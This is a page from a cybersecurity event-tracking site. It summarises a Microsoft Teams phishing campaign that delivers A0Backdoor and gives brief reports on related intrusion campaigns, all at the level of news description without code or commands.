CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

A0Backdoor Malware Deployed via Microsoft Teams Phishing Campaign

First reported
Last updated
1 unique sources, 2 articles

Summary

Hide ▲

A phishing campaign targeting financial and healthcare organizations uses Microsoft Teams to impersonate IT staff and trick victims into granting remote access via Quick Assist, deploying the A0Backdoor malware. The campaign, linked to the BlackBasta ransomware group, uses sophisticated TTPs including digitally signed MSI installers, DNS MX-based C2 communication, and DLL sideloading with legitimate Microsoft binaries. The attackers have refined their tactics to include multi-stage attack chains, beginning with external Teams chats impersonating IT staff to initiate Quick Assist sessions. After gaining access, they perform reconnaissance, deploy payloads via DLL sideloading with signed applications, and use Windows Remote Management (WinRM) for lateral movement. Targeted exfiltration is conducted using tools like Rclone to transfer sensitive data to external cloud storage, blending malicious activity with legitimate administrative operations.

Timeline

  1. 10.03.2026 00:50 2 articles · 1mo ago

    A0Backdoor Malware Deployed via Microsoft Teams Phishing Campaign

    Microsoft issues a warning about threat actors increasingly abusing external Microsoft Teams collaboration to impersonate IT or helpdesk staff via cross-tenant chats, tricking victims into granting remote access for data theft. Attackers leverage legitimate tools like Quick Assist and Rclone to transfer files to external cloud storage, blending malicious activity with normal IT support operations. The article details a nine-stage attack chain starting with external Teams chats impersonating IT staff, using Quick Assist for initial access, followed by reconnaissance via Command Prompt and PowerShell, DLL sideloading with signed applications (e.g., Autodesk, Adobe Acrobat/Reader, Windows Error Reporting) for payload execution, lateral movement via Windows Remote Management (WinRM), and targeted exfiltration using Rclone or similar tools to external cloud storage. HTTPS-based C2 communication is used to evade detection, and persistence is maintained via Windows Registry modifications. This expands on the initial campaign's TTPs, confirming the abuse of Quick Assist and DLL sideloading as part of a refined and stealthy intrusion methodology.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Payouts King ransomware leverages QEMU-based hidden VMs for covert operations and persistence

The Payouts King ransomware operation has integrated the QEMU emulator to deploy hidden Alpine Linux virtual machines (VMs) on compromised hosts, enabling attackers to bypass endpoint security controls and execute malicious activities without detection. Using reverse SSH tunnels and scheduled tasks, threat actors associated with the GOLD ENCOUNTER group operate these VMs to harvest credentials, perform Active Directory reconnaissance, and stage data for exfiltration. Initial access vectors include exploitation of SonicWall VPNs, CitrixBleed 2 (CVE-2025-5777), Cisco SSL VPNs, and social engineering via Microsoft Teams phishing. The campaign employs multi-stage encryption, toolchain customization, and anti-analysis techniques to maintain persistence and evade detection.

Open in new tab

Oyster Malware Distributed via Fake Microsoft Teams Installers

A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware, known as OysterLoader, provides attackers with remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download,' leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in October 2025. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, highlighting how users searching for Teams online were redirected to bogus download pages, where they were offered a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code signing services to sign the malicious installers and other post-compromise tools. In early 2026, OysterLoader evolved with new C2 infrastructure and obfuscation methods, including a multi-stage infection chain and dynamic API resolution to hinder detection and analysis.

Open in new tab

TA415 (APT41) Abuses Velociraptor Forensic Tool for C2 Tunneling via Visual Studio Code

Unknown threat actors, identified as TA415 (APT41), deployed the open-source Velociraptor forensic tool to download and execute Visual Studio Code, likely for command-and-control (C2) tunneling. The attack leveraged legitimate software and Windows utilities to minimize malware deployment and maintain a foothold in the target environment. The attackers used Cloudflare Workers domains for staging and additional payloads, and the incident highlights the evolving tactics of threat actors using legitimate tools for malicious purposes. The attack began with the use of the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain. Velociraptor was then used to establish contact with another Cloudflare Workers domain, facilitating the download and execution of Visual Studio Code with tunneling capabilities. This allowed for remote access and code execution, potentially leading to further malicious activities such as ransomware deployment. The phishing campaign targeted US government, think tank, and academic organizations involved in US-China relations, economic policy, and international trade. The attackers impersonated the US-China Business Council and John Moolenaar, Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party. The phishing messages contained links to password-protected archives hosted on cloud services, which included a shortcut (LNK) file and a hidden subfolder. Launching the LNK file executed a batch script that downloaded the VSCode Command Line Interface (CLI) from Microsoft’s servers, created a scheduled task for persistence, and established a VS Code remote tunnel authenticated via GitHub. The script also collected system information and the contents of various user directories, sending it to the attackers.

Open in new tab